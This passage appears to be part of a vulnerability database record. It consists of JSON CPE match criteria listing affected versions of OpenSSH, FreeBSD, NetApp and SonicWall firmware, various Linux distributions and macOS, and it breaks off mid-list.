| freebsd | freebsd | 14.0 | |
| freebsd | freebsd | 14.0 | |
| freebsd | freebsd | 14.0 | |
| freebsd | freebsd | 14.0 | |
| freebsd | freebsd | 14.0 | |
| freebsd | freebsd | 14.0 | |
| freebsd | freebsd | 14.0 | |
| freebsd | freebsd | 14.0 | |
| freebsd | freebsd | 14.0 | |
| freebsd | freebsd | 14.1 | |
| freebsd | freebsd | 14.1 | |
| netbsd | netbsd | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:sonicwall:sma_6200_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "92EF92CC-8175-4319-A529-AF979BAE5FCE",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:sonicwall:sma_6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "17BDC1B0-BE6A-4680-A78E-5338AD709095",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:sonicwall:sma_7200_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2FCBF1E6-3A6E-430A-AB34-AA48D4478C5F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:sonicwall:sma_7200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4C366A02-074C-4F98-AE68-30E0FF85CD00",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:arista:eos:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A5DA3089-31AA-499E-9C23-788503BE55B7",
"versionEndIncluding": "4.32.1f",
"versionStartIncluding": "4.32.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:23.10:*:*:*:*:*:*:*",
"matchCriteriaId": "602CE21C-E1A9-4407-A504-CF4E58F596F5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:24.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "BF90B5A4-6E55-4369-B9D4-E7A061E797D2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:almalinux:almalinux:9.0:-:*:*:*:*:*:*",
"matchCriteriaId": "57B93E9A-1483-4FF7-BF45-BD0D7D9F1747",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:sonicwall:sma_6210_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F87F7D08-7A28-493A-96BB-74C142109F8D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:sonicwall:sma_6210:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0734D1E1-2F59-4832-875F-AB03994B8992",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:sonicwall:sma_7210_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7592AE3D-D749-4494-9A55-71E2FD9BDFC0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:sonicwall:sma_7210:-:*:*:*:*:*:*:*",
"matchCriteriaId": "A15BA659-19D1-49AA-B249-EAE5E63B9B9A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:sonicwall:sma_8200v_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3CE83596-82B9-4656-8E50-50D79DF06FB0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:sonicwall:sma_8200v:-:*:*:*:*:*:*:*",
"matchCriteriaId": "68369A76-B0C3-4736-9EE6-4E0034111591",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:sonicwall:sra_ex_7000_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CCF845D8-65AE-4165-9742-B56E86AB7D21",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:sonicwall:sra_ex_7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0D435EFD-7B02-4921-8AC5-BBF07277F4B2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:a1k_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7F65C59D-249A-4790-892C-B78CF82E51CF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:a1k:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8E0E9D71-AF09-41F4-A1C7-94F616AF2832",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:a70_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6F7D6B02-55FE-4BF1-8607-A0D703E61055",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:a70:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D0FFEBCB-88AF-4AB2-A347-FB9420D2302A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:a90_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "550C1E38-56A3-4676-9D28-D66F66BA2FC8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:a90:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4812740A-7E14-4B43-8E08-3FACA2585B48",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:a700s_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FDD92BFA-9117-4E6E-A13F-ED064B4B7284",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:a700s:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4B7DA42F-5D64-4967-A2D4-6210FE507841",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:8300_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4E73901F-666D-4D8B-BDFD-93DD2F70C74B",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D0FD5AED-42CF-4918-B32C-D675738EF15C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:8700_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "34B25BEF-8708-4E2C-8BA6-EBCD5267EB04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:8700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CE0F11D2-B5D9-46B4-BFC5-C86BC87D516A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:a400_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "04E3BD77-8915-4FFC-8483-5DB5D610F829",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:a400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "97E94ECB-BB51-4364-BEDD-8648C193196F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:c400_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9AC7AD92-8B33-4137-A4EC-08641E4AF857",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:c400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AD443748-B0D1-4C1A-A62E-BD5FB5967370",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:a250_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1236B66D-EB11-4324-929F-E2B86683C3C7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:a250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "281DFC67-46BB-4FC2-BE03-3C65C9311F65",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:500f_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "ECF32BB1-9A58-4821-AE49-5D5C8200631F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:500f:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F21DE67F-CDFD-4D36-9967-633CD0240C6F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:c250_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F1AB1EC2-2560-494A-A51B-6F20CE318FEB",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:c250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "58DE2B52-4E49-4CD0-9310-00291B0352C7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:a800_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B36CECA5-4545-49C2-92EB-B739407B207F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:a800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D8E7549A-DE35-4274-B3F6-22D51C7A6613",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:c800_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B5AE3364-DB2D-4543-B1E2-175BF8BEBEE7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:c800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B64173B9-2A11-4390-AC76-7DD94F0CD305",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:a900_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "93B9B933-7D69-4B33-8983-C1CEC000B38B",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:a900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "641290E6-558D-439F-AEBA-8F7BFF3D5C74",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:a9500_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DEAA16D1-1E27-4128-BA14-5A0C59340EAA",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:a9500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D1C0A781-C3E2-4B41-8A30-FAD9E826270E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:c190_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "75A43965-CB2E-4C28-AFC3-1ADE7A6B845C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:c190:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0D421A96-E6E9-4B27-ADE0-D8E87A82EEDE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:a150_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "775078AE-16E0-4AF6-9022-372FC2852107",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:a150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "17D14D7F-E8E5-4669-8DB4-C634D0705EE9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:a220_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4F2D2745-242C-4603-899E-70C9025BDDD2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:a220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "EFB4541D-5EF7-4266-BFF3-2DDEC95E8012",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:fas2720_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B7FD1DA9-7980-4643-B378-7095892DA176",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:fas2720:-:*:*:*:*:*:*:*",
"matchCriteriaId": "347E9E3E-941C-4109-B59F-B9BB05486B34",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:fas2750_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AD661062-0D5B-4671-9D92-FEF8D7395C1E",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:fas2750:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8155BF5F-DD1B-4AB4-81F8-9BCE6A8821AE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:fas2820_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F997DB9A-AF66-4CE1-B33B-A04493ECBA19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:fas2820:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E0E8CD85-6C01-4B70-A1AA-750B46295194",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:bootstrap_os:-:*:*:*:*:*:*:*",
"matchCriteriaId": "95BA156C-C977-4F0C-8DFB-3FAE9CC8C02D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:hci_compute_node:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AD7447BC-F315-4298-A822-549942FC118B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EA924D87-8FAE-4E34-83F7-A5E25C7450E5",
"versionEndExcluding": "12.7.6",
"versionStartIncluding": "12.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7008225C-B5B9-4F87-9392-DD2080717E9A",
"versionEndExcluding": "13.6.8",
"versionStartIncluding": "13.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*",
"matchCriteriaId": "51E2E93B-C5A3-4C83-B806-2EC555AD45FE",
"versionEndExcluding": "14.6",
"versionStartIncluding": "14.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1102FFF5-77B1-400E-93F8-AC6CFE2CC93C",
"versionEndExcluding": "4.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F45F69D6-7E32-4483-9EFC-63697CDDD22C",
"versionEndIncluding": "9.8",
"versionStartIncluding": "8.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openbsd:openssh:4.4:-:*:*:*:*:*:*",
"matchCriteriaId": "4C37CBBB-A4AA-40D0-9609-0620FDC12BA8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openbsd:openssh:8.5:p1:*:*:*:*:*:*",
"matchCriteriaId": "7945F60B-460E-4CA6-9EB4-BEE663386D50",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openbsd:openssh:8.6:-:*:*:*:*:*:*",
"matchCriteriaId": "CB66ECE1-715A-4074-9355-E3512F7BCDBB",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux_eus:9.4:*:*:*:*:*:*:*",
"matchCriteriaId": "B03506D7-0FCD-47B7-90F6-DDEEB5C5A733",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux_for_arm_64:9.0_aarch64:*:*:*:*:*:*:*",
"matchCriteriaId": "2F7DAD7C-9369-4A87-A1D0-4208D3AF0CDC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux_for_arm_64_eus:9.4_aarch64:*:*:*:*:*:*:*",
"matchCriteriaId": "01363FFA-F7A6-43FC-8D47-E67F95410095",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:9.0_s390x:*:*:*:*:*:*:*",
"matchCriteriaId": "FB056B47-1F45-4CE4-81F6-872F66C24C29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:9.4_s390x:*:*:*:*:*:*:*",
"matchCriteriaId": "F843B777-5C64-4CAE-80D6-89DC2C9515B1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:9.0_ppc64le:*:*:*:*:*:*:*",
"matchCriteriaId": "E07C1C58-0E5F-4B56-9B8D-5DE67DB00F79",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:9.4_ppc64le:*:*:*:*:*:*:*",
"matchCriteriaId": "FC3CBA5D-9E5D-4C46-B37E-7BB35BE8DADB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux_server_aus:9.4:*:*:*:*:*:*:*",
"matchCriteriaId": "39D345D3-108A-4551-A112-5EE51991411A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:suse:linux_enterprise_micro:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "09F471C6-69AF-4E78-8143-17E783C80B9F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:12.0:*:*:*:*:*:*:*",
"matchCriteriaId": "46D69DCC-AE4D-4EA5-861C-D60951444C6C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:22.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "359012F1-2C63-415A-88B8-6726A87830DE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:22.10:*:*:*:-:*:*:*",
"matchCriteriaId": "47842532-D2B6-44CB-ADE2-4AC8630A4D8C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "21538C5B-A130-411E-B5F7-BBBA4C9D488A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:amazon:amazon_linux:2023.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F7D34E98-F549-4261-A42D-B37066C638B4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
"matchCriteriaId": "3A756737-1CC4-42C2-A4DF-E1C893B4E2D5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:e-series_santricity_os_controller:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8C5DA53D-744B-4087-AEA9-257F18949E4D",
"versionEndIncluding": "11.70.2",
"versionStartIncluding": "11.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:ontap:9:*:*:*:*:*:*:*",
"matchCriteriaId": "A20333EE-4C13-426E-8B54-D78679D5DDB8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:ontap_select_deploy_administration_utility:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E7CF3019-975D-40BB-A8A4-894E62BD3797",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:ontap_tools:9:*:*:*:*:vmware_vsphere:*:*",
"matchCriteriaId": "C2D814BE-93EC-42EF-88C5-EA7E7DF07BE5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:ontap_tools:10:*:*:*:*:vmware_vsphere:*:*",
"matchCriteriaId": "5333B745-F7A3-46CB-8437-8668DB08CD6F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:freebsd:freebsd:13.2:-:*:*:*:*:*:*",
"matchCriteriaId": "A87EFA20-DD6B-41C5-98FD-A29F67D2E732",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:13.2:p1:*:*:*:*:*:*",
"matchCriteriaId": "2888B0C1-4D85-42EC-9696-03FAD0A9C28F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:13.2:p10:*:*:*:*:*:*",
"matchCriteriaId": "556F4943-7BA4-4E09-94B3-4515DC3C7807",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:13.2:p11:*:*:*:*:*:*",
"matchCriteriaId": "6AFEC561-D79B-498B-B59D-1D82B21BDF1A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:13.2:p2:*:*:*:*:*:*",
"matchCriteriaId": "A3306F11-D3C0-41D6-BB5E-2ABDC3927715",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:13.2:p3:*:*:*:*:*:*",
"matchCriteriaId": "9E584FE1-3A34-492B-B10F-508DA7CBA768",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:13.2:p4:*:*:*:*:*:*",
"matchCriteriaId": "A5605E90-D125-4CC9-8B9F-F5EED9D4EE0C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:13.2:p5:*:*:*:*:*:*",
"matchCriteriaId": "761B4382-E857-4868-9F80-189B7F60256B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:13.2:p6:*:*:*:*:*:*",
"matchCriteriaId": "51B17801-15FD-4425-BA6C-BE06B14F1BFE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:13.2:p7:*:*:*:*:*:*",
"matchCriteriaId": "E9CAFF74-AD36-4D29-83F3-23E0417C485D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:13.2:p8:*:*:*:*:*:*",
"matchCriteriaId": "1B2D2A82-BFFE-45FE-9F79-4AF12C6DE69D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:13.2:p9:*:*:*:*:*:*",
"matchCriteriaId": "E7A81663-047E-4328-BE3A-CF65AB55B29F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:13.3:-:*:*:*:*:*:*",
"matchCriteriaId": "17DAE911-21E1-4182-85A0-B9F0059DDA7F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:13.3:p1:*:*:*:*:*:*",
"matchCriteriaId": "ABEA48EC-24EA-4106-9465-CE66B938635F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:13.3:p2:*:*:*:*:*:*",
"matchCriteriaId": "8DFB5BD0-E777-4CAA-B2E0-3F3357D06D01",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:13.3:p3:*:*:*:*:*:*",
"matchCriteriaId": "BC8C769C-A23E-4F61-AC42-4DA64421B096",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:14.0:-:*:*:*:*:*:*",
"matchCriteriaId": "FA25530A-133C-4D7C-8993-D5C42D79A0B5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:14.0:beta5:*:*:*:*:*:*",
"matchCriteriaId": "DB7B021E-F4AD-44AC-96AB-8ACAF8AB1B88",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:14.0:p1:*:*:*:*:*:*",
"matchCriteriaId": "69A72B5A-2189-4700-8E8B-1E5E7CA86C40",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:14.0:p2:*:*:*:*:*:*",
"matchCriteriaId": "5771F187-281B-4680-B562-EFC7441A8F88",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:14.0:p3:*:*:*:*:*:*",
"matchCriteriaId": "0A4437F5-9DDA-4769-974E-23BFA085E0DB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:14.0:p4:*:*:*:*:*:*",
"matchCriteriaId": "A9C3A3D4-C9F4-41EB-B532-821AF83470B1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:14.0:p5:*:*:*:*:*:*",
"matchCriteriaId": "878A1F0A-087F-47D7-9CA5-A54BB8D6676A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:14.0:p6:*:*:*:*:*:*",
"matchCriteriaId": "CE73CDC3-B5A7-4921-89C6-8F9DC426CB3E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:14.0:p7:*:*:*:*:*:*",
"matchCriteriaId": "50A5E650-31FB-45BE-8827-641B58A83E45",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:14.0:rc3:*:*:*:*:*:*",
"matchCriteriaId": "038E5B85-7F60-4D71-8D3F-EDBF6E036CE0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:14.0:rc4-p1:*:*:*:*:*:*",
"matchCriteriaId": "BF309824-D379-4749-A1FA-BCB2987DD671",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:14.1:-:*:*:*:*:*:*",
